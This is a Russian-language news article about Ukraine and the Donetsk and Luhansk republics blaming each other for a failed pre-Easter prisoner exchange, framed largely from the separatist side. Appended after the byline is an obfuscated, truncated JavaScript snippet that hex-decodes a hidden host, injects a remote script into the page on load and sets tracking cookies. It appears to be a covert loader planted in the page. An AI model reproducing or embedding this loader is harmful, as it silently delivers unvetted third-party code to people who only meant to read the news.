Украина и ДНР обвинили друг друга в срыве обмена пленными
Намерение сторон конфликта в Донбассе обменяться до Пасхи пленными по формуле «25 на 50» осталось неосуществленным. Киев и Донецк в резких выражениях заявили о саботаже этого соглашения. С украинской стороны говорилось о «подлом срыве», в ДНР заявляют о попытках Киева пойти на неравноценный обмен. Проблема разногласий, однако, совсем в другом.
Киев игнорирует выполнение минских соглашений в части обмена пленными и мошенничает, уклоняясь от требования обменять заложников по принципу «всех на всех», заявил глава Донецкой народной республики Александр Захарченко.
«К примеру, показав, с одной стороны, свою готовность к обмену пленными, с другой стороны, проигнорирует шестой пункт соглашений: обмен всех заложников и незаконно удерживаемых лиц на основе принципа «всех на всех», – приводит текст заявления главы республики «Донецкое агентство новостей». «По большому счету, Киев пытается выменять у нас своих силовиков, взятых в плен с оружием в руках, на людей, порой непричастных к конфликту и задержанных украинскими спецслужбами по совершенно надуманным поводам», – подчеркнул Захарченко. По его словам, в украинских застенках остаются тысячи сторонников ДНР, в том числе «отбывающих срок исключительно по политическим мотивам».
Захарченко заявил, что все заявления Киева о невозможности выполнения договоренностей, «о нашем бездействии в этом направлении – пустое сотрясение воздуха и попытка оправдать отсутствие политической воли». «О выполнении Киевом пятого и шестого пунктов Комплекса мер (амнистия и обмен пленными по принципу «всех на всех») говорить не приходится», – резюмировал глава ДНР.
Накануне аналогичный упрек в адрес Киева высказал и глава Луганской народной республики Игорь Плотницкий. «Украина продолжает игнорировать пятый и шестой пункты комплекса мер, в связи с чем процесс обмена практически остановлен. Последний обмен пленными состоялся 15 марта 2016 года по формуле «три на три». С того момента прошло полтора месяца», – говорилось в заявлении главы ЛНР, которое распространил Луганский информационный центр.
Пасхальный обмен не состоялся
Одновременно и украинская сторона выдвинула аналогичные обвинения. «Сегодня все было подло сорвано», – комментируя ситуацию с обменом пленными в формате «25 на 50», заявила представитель киевских властей в «гуманитарной подгруппе», первый вице-спикер Верховной рады Ирина Геращенко. По ее словам, в ходе переговоров подгруппы в Минске именно по вине представителей ДНР и ЛНР стороны так и не смогли согласовать списки тех, кого планировали обменять. «В прошлый раз мы выступили с инициативой к Пасхе освободить 25 заложников и выразили готовность передать 50 человек», – напомнила Геращенко на своей странице в Facebook.
В понедельник, будучи в Брюсселе на заседании комиссии Европарламента по ассоциации Украины и ЕС, Геращенко сообщила, что в плену «боевиков» в Донбассе незаконно содержатся 115 украинцев. «Если говорить о гуманитарном аспекте, то здесь наших коллег интересовала ситуация с освобождением незаконно удерживаемых лиц», – сообщила Геращенко в эфире телеканала «112 Украина». Для сравнения напомним, что 21 марта представители ДНР сообщили: примерно 200 ополченцев Донецкой народной республики, которые находятся в украинских тюрьмах, не выходят на связь.
Геращенко, сославшись на предыдущий раунд минских переговоров, проанонсировала подготовку нового обмена пленными между Киевом и республиками Донбасса. Именно тогда было заявлено, что взаимная передача захваченных военнослужащих состоится в преддверии Пасхи, «чтобы десятки семей встретили этот светлый православный праздник вместе».
Однако одновременно с этим заявлением представитель Луганской народной республики в гуманитарной подгруппе Ольга Кобцева сообщила, что стороны пока не нашли точки соприкосновения в переговорах о дате и формате обмена.
К слову, заметим, что у самой Геращенко возникли проблемы с принимающей стороной.
Власти Белоруссии временно запретили въезд представительнице Киева в гуманитарной подгруппе – об этом в среду сообщил замглавы администрации Александра Лукашенко Константин Елисеев. Сама Геращенко написала на своей странице в Facebook, что находится в Минске, хотя попала в страну «с приключениями». Детали она обещала озвучить позже. В конце марта в ФСБ сообщили, что Геращенко запрещен въезд на территорию России.
«Официально военнопленных нет»
«Пункт об обмене пленными сложно выполнить и проконтролировать. Военнопленные – это весьма растяжимое понятие в условиях гражданского конфликта, в котором официально военнопленных нет», – заметил директор Центра евразийских исследований Владимир Корнилов.
Он напомнил, что Киев неоднократно злоупотреблял этим пунктом и не раз присылал в ДНР людей, которые вообще не имели никакого отношения к данному конфликту
«Мы видим, как в сепаратизме обвиняют людей, вообще далеких от данного конфликта. Но раз уж они обвинены в пособничестве ДНР и ЛНР, то формально они тоже попадают под эти пункты, ДНР с ЛНР тоже вправе требовать выдачи этих людей, которые на самом деле никакого отношения к этим республикам не имеют», – констатирует Владимир Корнилов. Но опять-таки, продолжает он, «требовать можно, но четких параметров данного обмена установить в условиях данной гражданской войны фактически невозможно.
Тем не менее, отмечает эксперт, Запад и европейские гаранты минского соглашения должны и дальше принуждать Киев выполнять договоренности, «жестко требовать выдавать и политзаключенных, которых Киев хватает по всей Украине под видом сепаратистов». Собеседник указывает на то, что помощник госсекретаря США Виктория Нуланд в ходе своего визита в Киев пытается надавить на украинские власти, дабы те выполнили некоторые пункты «Минска-2», в том числе по обмену пленными.
Андрей Резчиков, Михаил Мошкин
<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>
Комментарии